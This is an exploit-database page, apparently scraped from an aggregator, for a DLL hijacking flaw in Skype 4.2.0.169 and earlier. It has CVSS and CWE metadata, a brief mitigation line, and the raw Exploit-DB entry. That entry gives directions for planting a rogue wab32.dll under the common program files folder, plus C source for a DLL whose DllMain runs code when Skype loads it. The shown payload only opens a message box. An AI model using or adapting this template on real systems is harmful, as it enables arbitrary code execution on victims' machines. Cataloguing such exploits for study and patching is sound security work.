Skype - exploit.company

vendor:

Skype

by:

Glafkos Charalambous

5.5

CVSS

MEDIUM

DLL Hijacking

CWE

Product Name: Skype

Affected Version From: Skype 4.2.0.169 and earlier

Affected Version To: Skype 4.2.0.169

Patch Exists: NO

Related CWE:

CPE: a:skype:skype:4.2.0.169

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 x64 Ultimate

2010

Skype <= 4.2.0.169 DLL Hijacking Exploit (wab32.dll)

This exploit allows an attacker to hijack the DLL file used by Skype version 4.2.0.169 and earlier, specifically the wab32.dll file. By placing a malicious wab32.dll file in the appropriate directory, an attacker can execute arbitrary code when Skype is launched.

Mitigation:

Upgrade Skype to a version higher than 4.2.0.169 or apply vendor patches if available.

Source

Exploit-DB raw data:

/* 
Exploit Title: Skype <= 4.2.0.169 DLL Hijacking Exploit (wab32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: Latest Skype v4.2.0.169
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .skype
Greetz: Astalavista, OffSEC, Exploit-DB
Notes: Create folders %commonprogramfiles%\system and place wab32.dll
       %commonprogramfiles(x86)% on x64 bit
*/


#include <windows.h>
#define DllExport __declspec (dllexport)

BOOL WINAPI  DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
  dll_hijack();
  return 0;
}

int dll_hijack()
{
  MessageBox(0, "Skype DLL Hijacking!", "DLL Message", MB_OK);
  return 0;
}